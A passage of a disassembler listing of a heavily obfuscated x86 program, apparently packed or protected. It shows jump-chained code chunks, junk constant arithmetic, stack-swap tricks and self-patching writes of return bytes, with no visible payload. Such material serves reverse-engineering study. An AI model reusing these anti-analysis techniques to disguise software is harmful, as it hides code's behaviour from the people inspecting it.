; FUNCTION CHUNK AT 0044C73D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C7B4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D63E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D755 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E8FA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045097F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D8A SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00452E3E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453E19 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00453F8F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004549FE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004563C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458039 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458B01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458C86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459762 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A9BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B5C4 SIZE 00000018 BYTES

		xchg	esi, [esp+0]
		pop	esi
		jz	loc_44E8FA
		mov	eax, ds:dword_4495B0
		or	eax, eax
		jnz	loc_439240
		jmp	loc_43C61B
sub_448BC0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_448BDD:				; CODE XREF: sub_43EF3E:loc_444310j
		xor	ebp, 7D16D42Fh
		jmp	loc_43ED42
; END OF FUNCTION CHUNK	FOR sub_43EF3E

; =============== S U B	R O U T	I N E =======================================



sub_448BE8	proc near		; DATA XREF: sub_450FB5+Do

; FUNCTION CHUNK AT 004395DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ACE6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CC3D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045402A SIZE 00000005 BYTES

		push	597DEBF8h
		pop	eax
		and	eax, 3DFBF630h
		rol	eax, 9
		jmp	loc_45402A
sub_448BE8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452238

loc_448BFC:				; CODE XREF: sub_452238+13j
		xor	eax, 0EA2FC158h
		add	eax, ebp
		add	eax, 31AE5770h
		push	edx
		jmp	loc_43969E
; END OF FUNCTION CHUNK	FOR sub_452238
; ---------------------------------------------------------------------------
		push	edi
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_448C11:				; CODE XREF: sub_44D149:loc_45B4ACj
		mov	edi, eax
		xchg	edi, [esp+0]
		ror	eax, 6
		jmp	loc_4422F7
; END OF FUNCTION CHUNK	FOR sub_44D149
; ---------------------------------------------------------------------------

locret_448C1E:				; CODE XREF: hvvrg7ie:004516C5j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_448C1F:				; CODE XREF: sub_45038B-188Aj
		jz	loc_4529AB
		jmp	loc_455C67
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_448C2A:				; CODE XREF: sub_449425+2911j
		test	edx, 68E47DADh
		jmp	loc_442C30
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		call	sub_43C989
; START	OF FUNCTION CHUNK FOR sub_455F5D

loc_448C3A:				; CODE XREF: sub_455F5D+5779j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_455F5D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D140

loc_448C3F:				; CODE XREF: sub_43D140+Bj
		jmp	loc_43D498
; END OF FUNCTION CHUNK	FOR sub_43D140
; ---------------------------------------------------------------------------

loc_448C44:				; CODE XREF: hvvrg7ie:0045308Aj
		mov	edi, ebx

; =============== S U B	R O U T	I N E =======================================



sub_448C46	proc near		; CODE XREF: sub_44F66B+1p

; FUNCTION CHUNK AT 004392C7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043E0D5 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		jmp	loc_4392C7
sub_448C46	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_448C54:				; CODE XREF: sub_45AAC8:loc_43BBB7j
		jz	loc_43E28D
		jmp	loc_443000
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458175

loc_448C5F:				; CODE XREF: sub_458175+5j
		jnz	loc_451C51

loc_448C65:				; CODE XREF: hvvrg7ie:0044D1A9j
		mov	eax, [esp+0]
		push	esi
		mov	esi, edx
		jmp	loc_44B21F
; END OF FUNCTION CHUNK	FOR sub_458175
; ---------------------------------------------------------------------------

loc_448C70:				; CODE XREF: hvvrg7ie:00459FA7j
		jz	loc_45A082

; =============== S U B	R O U T	I N E =======================================



sub_448C76	proc near		; CODE XREF: sub_4405D7+2C00p
		xchg	eax, [esp+0]
		pop	eax
		add	eax, ebp
		call	sub_45AEE1

loc_448C81:				; CODE XREF: sub_440ACD+7j
		jmp	sub_450C5A
sub_448C76	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_448C86:				; CODE XREF: sub_440643-2713j
		jmp	loc_45A580
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------

loc_448C8B:				; CODE XREF: hvvrg7ie:004574D7j
		xchg	ebp, ecx
		adc	ebp, edi
		push	ebx
		add	ebp, 4E29BE64h
; START	OF FUNCTION CHUNK FOR sub_451669

loc_448C96:				; CODE XREF: sub_451669:loc_4574C6j
		sub	edi, 6CFC1A4Ch
		and	edi, 0A35BEF0Eh
		jmp	loc_45086C
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458E44

loc_448CA7:				; CODE XREF: sub_458E44:loc_445B3Cj
		lea	eax, sub_458E44
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A911
; END OF FUNCTION CHUNK	FOR sub_458E44

; =============== S U B	R O U T	I N E =======================================



sub_448CB5	proc near		; CODE XREF: sub_41A40D+Cp
					; sub_448CB5+5j
					; DATA XREF: ...
		call	sub_448CCA
		jmp	ds:off_41D024
sub_448CB5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_448CC0:				; CODE XREF: sub_444B29+F175j
		jmp	loc_456EBD
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_448CC5:				; CODE XREF: sub_443375+E3Cj
		jmp	loc_4552C5
; END OF FUNCTION CHUNK	FOR sub_443375

; =============== S U B	R O U T	I N E =======================================



sub_448CCA	proc near		; CODE XREF: hvvrg7ie:0044669Fj
					; sub_448CB5p ...

; FUNCTION CHUNK AT 004415FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449EE5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D086 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457BCF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045857B SIZE 00000016 BYTES

		jnb	loc_449EE5
		xchg	esi, [esp+0]
		jmp	loc_44D086
sub_448CCA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508B6

loc_448CD8:				; CODE XREF: sub_4508B6:loc_45385Dj
		pushf
		push	offset sub_443874
		jmp	nullsub_339
; END OF FUNCTION CHUNK	FOR sub_4508B6
; ---------------------------------------------------------------------------
		js	loc_45B6FB
		jmp	sub_43D622
; ---------------------------------------------------------------------------
		dw 4E32h
dword_448CF0	dd 770h			; DATA XREF: hvvrg7ie:0043CDE1w
					; sub_440C61:loc_4506DAw ...
dword_448CF4	dd 13BBEA3Bh		; DATA XREF: sub_448100:loc_443700w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_448CF8:				; CODE XREF: sub_456A52-108A0j
		jmp	loc_44295E
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
		db 9, 0DAh, 0D5h
dword_448D00	dd 0ACEFD00Ch		; DATA XREF: sub_456A52-1162Br
					; hvvrg7ie:loc_45738Bw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_448D04:				; CODE XREF: sub_4580B4-13D67j
		jmp	loc_446657
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_448D09:				; CODE XREF: sub_452B83-13741j
		jmp	loc_450876
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
		dw 8846h
dword_448D10	dd 153970h		; DATA XREF: hvvrg7ie:0043A77Bw
					; sub_44388C:loc_43AD1Dr ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_448D14:				; CODE XREF: sub_448BC0-B453j
		jmp	loc_44D63E
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
		db 87h,	0B9h, 0EAh
dword_448D1C	dd 796377E7h		; DATA XREF: hvvrg7ie:loc_445EB4r
					; hvvrg7ie:0044BB6Ew ...
; ---------------------------------------------------------------------------

loc_448D20:				; CODE XREF: hvvrg7ie:0043D130j
		jmp	locret_45B2F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_448D25:				; CODE XREF: sub_440AD9-2E50j
		pop	eax
		and	eax, 80696A3h
		add	eax, 143FB2FDh
		add	eax, ebp
		add	eax, 0EBBDC64Fh
		mov	dword ptr [eax], 737361h
		push	0
		lea	eax, [ebp-20h]
		jmp	sub_452265
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
		or	edx, ebp
		not	esi
		jmp	sub_442DEE
; ---------------------------------------------------------------------------

loc_448D53:				; CODE XREF: hvvrg7ie:00445984j
		push	15356847h
		mov	[ebp+0], edx
		or	ecx, 0DE874676h
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_448D61:				; CODE XREF: sub_443BCD+18j
		or	esi, 0E4E54ACh
		jns	loc_44AF36

loc_448D6D:				; CODE XREF: sub_442FD1+178B3j
		jmp	loc_445952
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DC4

loc_448D72:				; CODE XREF: sub_445DC4+EE38j
		jmp	loc_44CC50
; END OF FUNCTION CHUNK	FOR sub_445DC4
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_44AF30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440195

loc_448D7D:				; CODE XREF: sub_440195+597Bj
					; sub_440195:loc_445E73j
		call	loc_440ABB

loc_448D82:				; CODE XREF: hvvrg7ie:00455340j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_440195
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_448D87:				; CODE XREF: sub_44616F+D1j
		jmp	nullsub_368
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_448D8C:				; CODE XREF: sub_457F50-18E40j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456881

loc_448D91:				; CODE XREF: sub_456881-1B2E1j
		jg	loc_44AA61

loc_448D97:				; CODE XREF: sub_456881:loc_43B965j
		add	ebx, 0E40E8591h
		xchg	ebx, [esp+8+var_8]
		jmp	sub_44973C
; END OF FUNCTION CHUNK	FOR sub_456881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_448DA5:				; CODE XREF: sub_43F227:loc_43D6E8j
		add	edx, 0F2B793BCh
		test	esi, eax
		jmp	loc_43EA71
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_448DB2	proc near		; CODE XREF: sub_452B83:loc_457292p
					; hvvrg7ie:0045B0D2j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043928E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004414FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF0A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004587D6 SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0F689746Eh
		pop	edx
		add	edx, 3A594307h
		and	edx, 37B97739h
		or	edx, 0B24AC6D9h
		cmp	edx, 8BE6B367h
		jmp	loc_4414FD
sub_448DB2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jg	nullsub_234
		jmp	sub_45B3FF

; =============== S U B	R O U T	I N E =======================================



sub_448DE4	proc near		; CODE XREF: hvvrg7ie:0043FB20j
					; sub_451E6D-108D8p

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043ADAD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043CDFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441477 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445EDE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447322 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004477E2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447F89 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044AA40 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CFEC SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044EB77 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00456BE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045877F SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		call	sub_43B5E2

loc_448DEE:				; CODE XREF: sub_44B7CB+78DBj
		xchg	esi, eax
		jo	loc_4477E2
		sbb	ecx, 4FB67DFCh

loc_448DFC:				; CODE XREF: sub_44B7CB:loc_44B4EAj
		mov	eax, [ebp-14h]
		mov	eax, [eax+64h]
		add	eax, [ebp-18h]
		cmp	eax, [ebp-10h]
		jmp	loc_44AA40
sub_448DE4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4398B7

loc_448E0D:				; CODE XREF: sub_4398B7+10j
		and	eax, 0EDE9AD18h
		xor	eax, 950AE05Eh
		rol	eax, 3
		and	eax, 0DB90F49Ah
		add	eax, 78342D00h
		call	sub_4498FB
; END OF FUNCTION CHUNK	FOR sub_4398B7
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_448E2D:				; CODE XREF: sub_4447AC:loc_44DBE2j
		jz	loc_447E70

loc_448E33:				; CODE XREF: sub_440D0C+16j
		jmp	loc_43A6A0
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EA21

loc_448E38:				; CODE XREF: sub_43EA21-1556j
		jmp	loc_43E8D0
; END OF FUNCTION CHUNK	FOR sub_43EA21
; ---------------------------------------------------------------------------

loc_448E3D:				; CODE XREF: hvvrg7ie:00439B86j
		jmp	loc_4454EA
; ---------------------------------------------------------------------------
		sbb	esi, 0F86F0A39h
		or	esi, 43B006C8h
		xchg	ebp, esi
		jmp	loc_447E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443874

loc_448E55:				; CODE XREF: sub_443874:loc_446742j
		add	edx, 0FFB80D1Fh
		popf
		xchg	edx, [esp-4+arg_0]
		jmp	loc_44D51D
; END OF FUNCTION CHUNK	FOR sub_443874
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 3

loc_448E68:				; CODE XREF: hvvrg7ie:loc_4402EDj
		jmp	loc_45A090
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4584F2

loc_448E6D:				; CODE XREF: sub_4584F2j
		push	edx
		mov	edx, ebp
		xchg	edx, [esp+4+var_4]
		jmp	loc_442503
; END OF FUNCTION CHUNK	FOR sub_4584F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_448E78:				; CODE XREF: sub_445BE8:loc_455D53j
		mov	[ebp+var_20], eax
		mov	eax, [ebp+var_20]
		call	sub_44E72F

loc_448E83:				; CODE XREF: sub_44BEBB+D7A2j
		jmp	loc_4494D8
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_448E88:				; CODE XREF: sub_4403B6+8624j
		jmp	loc_443A33
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446356

loc_448E8D:				; CODE XREF: sub_446356-C2A5j
		jmp	loc_43F12B
; END OF FUNCTION CHUNK	FOR sub_446356
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_448E92:				; CODE XREF: sub_450E01:loc_445714j
		sub	ebx, 0AF6CD80Ah
		cmp	ebx, 1E61C6B8h
		jmp	loc_43ADE2
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_448EA3:				; CODE XREF: sub_446E8C:loc_44058Cj
		jnz	loc_453C6E
		jmp	loc_4489A4
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_448EAE:				; CODE XREF: sub_458F33-C6DDj
		mov	ebp, 2B68D393h
		pushf
		jmp	loc_457F1F
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------

loc_448EB9:				; CODE XREF: hvvrg7ie:loc_450466j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_29

; =============== S U B	R O U T	I N E =======================================



sub_448EC1	proc near		; CODE XREF: sub_404DF4+27p
					; sub_448EC1+5j
					; DATA XREF: ...
		call	sub_448ECC
		jmp	ds:off_41D184
sub_448EC1	endp


; =============== S U B	R O U T	I N E =======================================



sub_448ECC	proc near		; CODE XREF: sub_448ECC-90DBj
					; sub_448EC1p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A3F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FDDD SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00445AC3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00445E0A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450D28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E9B SIZE 00000011 BYTES

		jnz	loc_43FDF6
		jmp	loc_445E0A
sub_448ECC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448ED7:				; CODE XREF: hvvrg7ie:00453A65j
		rol	edx, 1Ah
		sub	edx, 36CF8F6Ch
		xor	edx, 0A30CD72Fh
; START	OF FUNCTION CHUNK FOR sub_450434

loc_448EE6:				; CODE XREF: sub_450434:loc_43EA4Fj
		add	edi, edx
		pop	edx
		jmp	loc_455771
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_448EEE:				; CODE XREF: sub_44E3B3:loc_44FE3Cj
		rol	edx, 17h
		add	edx, 20CDA819h
		add	edx, ebp
		add	edx, 5EFFD7CBh
		mov	[edx], eax
		pop	edx
		mov	eax, [ebp-1Ch]
		mov	eax, [eax]
		jmp	loc_44D43C
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_448F0C:				; CODE XREF: sub_450434-FAACj
		mov	eax, ecx
		pop	ecx
		pop	ebp
		jmp	loc_44E37F
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_448F15:				; CODE XREF: hvvrg7ie:0043CEA8j
		shl	eax, 16h
		rol	edx, 14h
		and	ecx, 10412682h
		jmp	loc_445197
; ---------------------------------------------------------------------------

loc_448F26:				; CODE XREF: hvvrg7ie:00442D63j
		pop	edi
		and	edi, 6AD8577Eh
		add	edi, 280C0685h
		add	eax, edi
		pop	edi
		jmp	loc_44BE40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_448F3B:				; CODE XREF: sub_45AAC8j
		mov	eax, ds:dword_43E5D8
		or	eax, eax
		jnz	loc_44322E
		jmp	loc_44DAAE
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ACF1

loc_448F4E:				; CODE XREF: sub_45ACF1-42D2j
		add	ecx, ebp
		xor	eax, ebx

loc_448F52:				; CODE XREF: hvvrg7ie:loc_45AF2Bj
		call	nullsub_9
		retn
; END OF FUNCTION CHUNK	FOR sub_45ACF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_448F58:				; CODE XREF: sub_44A6D7-3524j
		jmp	loc_447BFF
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_448F5E:				; CODE XREF: hvvrg7ie:00453AA0j
					; sub_43E063+187E2j
		call	sub_439549
		jmp	loc_4520CF
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------

loc_448F68:				; CODE XREF: hvvrg7ie:0045597Aj
		ja	loc_439200
; START	OF FUNCTION CHUNK FOR sub_44412E

loc_448F6E:				; CODE XREF: sub_44412E:loc_455968j
		add	esi, 4FDD9907h
		sub	esi, 88D2235Bh
		add	esi, 0F888007Fh
		xchg	esi, [esp+4+var_4]
		jmp	loc_4570D4
; END OF FUNCTION CHUNK	FOR sub_44412E
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_4491A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D9F9

loc_448F8E:				; CODE XREF: sub_43D9F9+1DDAEj
		and	esi, ds:4000F7h
		add	esi, 0FC38805Ah
		xor	esi, 2E90D6A2h
		rol	esi, 4
		add	esi, 5D94C703h
		jmp	loc_43AA3F
; END OF FUNCTION CHUNK	FOR sub_43D9F9
; ---------------------------------------------------------------------------

loc_448FAE:				; CODE XREF: hvvrg7ie:0043C6FCj
		sbb	esi, edx

; =============== S U B	R O U T	I N E =======================================



sub_448FB0	proc near		; CODE XREF: hvvrg7ie:0043B297p

; FUNCTION CHUNK AT 00439060 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442E51 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444893 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444C0A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444E7F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004515AE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004520C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D0E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458B64 SIZE 0000001D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4520C2
		jmp	loc_43A9FC
sub_448FB0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448FC5	proc near		; CODE XREF: hvvrg7ie:004540E5j
					; sub_448CCA+F8BDp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004392E8 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		jmp	loc_4392E8
sub_448FC5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_448FD1:				; CODE XREF: sub_43F227+C06Aj
		mov	eax, [esp+0]
		push	offset sub_44DF5A
		jmp	nullsub_158
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_448FDE:				; CODE XREF: hvvrg7ie:00456DB7j
		ror	ecx, 9
		or	eax, 7DBB880Fh
		test	esi, ecx
		jmp	loc_45A16E
; ---------------------------------------------------------------------------

loc_448FEE:				; CODE XREF: hvvrg7ie:loc_44EC79j
		jnz	loc_43C91B
		jmp	loc_457EFB
; ---------------------------------------------------------------------------
		mov	esp, ebp
		xchg	edi, [esp]
		mov	ebp, edi
		pop	edi
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C2A3

loc_449002:				; CODE XREF: sub_43C2A3+Aj
		jmp	loc_452F1F
; END OF FUNCTION CHUNK	FOR sub_43C2A3

; =============== S U B	R O U T	I N E =======================================



sub_449007	proc near		; CODE XREF: sub_44DD3E-8D07j
					; sub_44107D+E38Ap ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043993C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B942 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DAE1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445994 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004476BE SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044A41D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044B666 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B879 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456252 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E46 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458EA9 SIZE 00000005 BYTES

		jns	loc_44B666
		push	ebp
		mov	ebp, esp
		jmp	loc_456252
sub_449007	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_449015:				; CODE XREF: sub_44B7CB+7144j
		or	eax, 1AB07BDDh
		mov	ebx, [eax]
		jmp	loc_440850
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_449022:				; CODE XREF: sub_44E4A6-128D9j
		pop	ecx
		or	ecx, 0CA9DDC97h
		rol	ecx, 0Fh
		test	ecx, 2000h
		jmp	loc_4472FC
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------
		mov	eax, 38F24592h
		push	edx
		call	sub_454BA2
; START	OF FUNCTION CHUNK FOR sub_44E609

loc_449042:				; CODE XREF: sub_44E609:loc_44E617j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_44E609
; ---------------------------------------------------------------------------

loc_449047:				; CODE XREF: hvvrg7ie:0043BF81j
		jmp	loc_451CAA
; ---------------------------------------------------------------------------

loc_44904C:				; DATA XREF: sub_43A0C9+B81Ao
		xchg	ecx, [esp]
		jmp	loc_4515D1
; ---------------------------------------------------------------------------
		jnz	loc_4494DE
		jmp	sub_44AA1C

; =============== S U B	R O U T	I N E =======================================



sub_44905F	proc near		; CODE XREF: hvvrg7ie:00449A12p
					; hvvrg7ie:00453C57j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044D02C SIZE 0000001B BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		push	edi
		push	977B3823h
		jmp	loc_44D02C
sub_44905F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44906F:				; CODE XREF: sub_43E60A-3000j
					; sub_452AE5:loc_4545A3j
		push	esi
		push	8DE5CDE3h
		pop	esi
		rol	esi, 9
		jmp	loc_4470A4
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_44907E:				; CODE XREF: sub_452265-17A31j
		or	ecx, 35D9F3C5h

loc_449084:				; CODE XREF: hvvrg7ie:00452CDFj
		and	ecx, 0FABE05B5h
		xor	ecx, ds:4000F6h
		add	ecx, 86C2187Fh
		jmp	loc_43D694
; END OF FUNCTION CHUNK	FOR sub_452265
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_44909B:				; CODE XREF: sub_45202B+Cj
		xchg	esi, [esp+0]
		push	esi
		pop	ebp
		pop	esi
		push	7BBB4D6Dh
		pop	eax
		or	eax, 718A785Eh
		jmp	loc_4401B0
; END OF FUNCTION CHUNK	FOR sub_45202B

; =============== S U B	R O U T	I N E =======================================



sub_4490B2	proc near		; DATA XREF: sub_4550CA-90C9o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C6BF SIZE 00000007 BYTES

		xchg	esi, [esp+0]

loc_4490B5:				; CODE XREF: hvvrg7ie:loc_44A35Bj
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		jmp	loc_43C6BF
sub_4490B2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_4490C0:				; CODE XREF: sub_4540B2:loc_43E595j
		mov	eax, [eax]
		push	edx
		push	9B53A2CDh
		pop	edx
		rol	edx, 0Ah
		or	edx, 2BB59669h
		cmp	edx, 0A1540BE9h
